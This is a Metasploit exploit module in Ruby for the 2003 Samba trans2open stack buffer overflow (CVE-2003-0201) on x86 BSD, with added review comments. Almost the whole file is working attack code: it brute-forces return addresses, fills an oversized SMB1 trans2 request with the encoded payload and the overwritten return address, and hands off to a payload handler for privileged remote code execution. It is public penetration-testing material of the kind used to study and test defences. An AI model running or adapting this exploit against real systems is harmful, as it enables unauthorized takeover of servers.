##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for the Samba 2.2.x trans2open buffer overflow
# (CVE-2003-0201, see 'References' below) on x86 *BSD builds of smbd.
# The return address is not known up front, so the module relies on
# Msf::Exploit::Brute to call brute_exploit once per candidate address in
# the target's 'Bruteforce' range.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::SMB::Client
  include Msf::Exploit::Brute

  # Module metadata, payload constraints and options.
  #
  # @param info [Hash] module info supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Samba trans2open Overflow (*BSD x86)',
        # NOTE(review): the text below says "x86 Linux", but 'Platform' is 'bsd'
        # and the name says *BSD — the wording looks inherited from the Linux
        # variant of this module; confirm and correct upstream.
        'Description' => %q{
          This exploits the buffer overflow found in Samba versions
          2.2.0 to 2.2.8. This particular module is capable of
          exploiting the flaw on x86 Linux systems that do not
          have the noexec stack option set.
        },
        'Author' => [ 'hdm', 'jduck' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2003-0201' ],
          [ 'OSVDB', '4469' ],
          [ 'BID', '7294' ],
          [ 'URL', 'https://seclists.org/bugtraq/2003/Apr/103' ]
        ],
        'Privileged' => true,
        'Payload' => {
          # brute_exploit copies the encoded payload to the front of a 1988-byte
          # buffer and writes the return address at target 'Offset' (1055);
          # 'Space' must stay below that offset so the two never overlap.
          'Space' => 1024,
          # NUL is excluded from the encoded payload.
          'BadChars' => "\x00",
          'MinNops' => 512,
          'StackAdjustment' => -3500
        },
        'Platform' => 'bsd',
        'Arch' => [ ARCH_X86 ],
        'Targets' => [
          # tested OK - jjd:
          # FreeBSD 5.0-RELEASE samba-2.2.7a.tbz md5:cc477378829309d9560b136ca11a89f8
          [
            'Samba 2.2.x - Bruteforce',
            {
              # Base for the three pointers written after the return address in
              # brute_exploit; they must land on readable stack memory.
              'PtrToNonZero' => 0xbfbffff4, # near the bottom of the stack
              # Byte offset of the saved return address inside the request buffer.
              'Offset' => 1055,
              # Candidate return addresses are tried from 'Start' to 'Stop' in
              # steps of 'Step'; each candidate is one brute_exploit call.
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0xbfbffdfc },
                'Stop' => { 'Ret' => 0xbfa00000 },
                'Step' => 256
              }
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2003-04-07',
        'Notes' => {
          'AKA' => ['ECHOWRECKER'],
          # Each wrong guess presumably crashes the smbd process handling the
          # connection; the resulting crash/restart entries are what IOC_IN_LOGS
          # refers to and are the observable for defenders.
          'Stability' => [ CRASH_SERVICE_RESTARTS, ],
          'Reliability' => [ REPEATABLE_SESSION, ],
          'SideEffects' => [ IOC_IN_LOGS, ]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(139)
      ]
    )

    # The SMB dialect is not user-selectable: brute_exploit always connects
    # with versions: [1] (SMB1 only).
    deregister_options('SMB::ProtocolVersion')
  end

  # One brute-force attempt, invoked by Msf::Exploit::Brute for each candidate
  # return address in the target's 'Bruteforce' range.
  #
  # @param addrs [Hash] current candidate; only 'Ret' (the return address to try) is read
  # @return [void] errors are printed rather than raised, presumably so the
  #   caller's loop can move on to the next candidate
  def brute_exploit(addrs)
    curr_ret = addrs['Ret']
    begin
      print_status('Trying return address 0x%.8x...' % curr_ret)

      # Fresh SMB1 session for every attempt.
      connect(versions: [1])
      smb_login

      # This value *must* be 1988 to allow findrecv shellcode to work
      # XXX: I'm not sure the above comment is true...
      pattern = rand_text_english(1988)

      # See the OSX and Solaris versions of this module for additional
      # information.

      # eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2
      # (rpmbuild -bp ; edited/reran config.status ; make)
      eip_off = target['Offset']
      ptr_to_non_zero = target['PtrToNonZero']

      # Layout of `pattern` (offsets relative to its start):
      #   [0, payload.length)  encoded payload
      #   eip_off              return address (curr_ret)
      #   eip_off + 4 .. + 15  three stack pointers derived from ptr_to_non_zero
      # All multi-byte values are packed with 'V' (32-bit little-endian, x86).

      # Stuff the shellcode into the request
      pattern[0, payload.encoded.length] = payload.encoded

      # We want test true here, so we overwrite conn with a pointer
      # to something non-zero.
      #
      # 222 if (IS_IPC(conn)) {
      # 223 return(ERROR(ERRSRV,ERRaccess));
      # 224 }
      pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V')

      # We want to avoid crashing on the following two derefences.
      #
      # 116 int error_packet(char *inbuf,char *outbuf,int error_class,uint32 error_code,int line)
      # 117 {
      # 118 int outsize = set_message(outbuf,0,0,True);
      # 119 int cmd = CVAL(inbuf,smb_com);
      pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V')
      pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V')

      # This stream covers the framepointer and the return address
      # pattern[1199, 400] = [curr_ret].pack('N') * 100
      pattern[eip_off, 4] = [curr_ret].pack('V')

      # Fixed SMB1 request prefix: 4-byte NetBIOS session header, the
      # "\xffSMB" magic, command 0x32 (SMB_COM_TRANSACTION2), followed by the
      # header/parameter bytes for the trans2 call. Kept verbatim; the
      # oversized `pattern` appended below is what triggers the overflow.
      trans = "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"
      trans << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
      trans << "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"
      trans << "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"
      trans << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
      trans << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"
      trans << pattern

      # puts "press any key"; $stdin.gets

      # Raw write on the authenticated session socket, then give the payload
      # handler a chance to pick up a session before tearing down.
      sock.put(trans)
      handler
      # NOTE(review): only reached on the success path; if connect, smb_login
      # or sock.put raise, the rescue branches below just report the error and
      # never call disconnect. Whether the framework closes the socket before
      # the next attempt is not visible in this file — confirm.
      disconnect
    # EOFError is a StandardError subclass, so the second rescue alone would
    # catch it; both branches intentionally just report and return.
    rescue EOFError => e
      print_error(e.to_s)
    rescue StandardError => e
      print_error(e.to_s)
    end
  end
end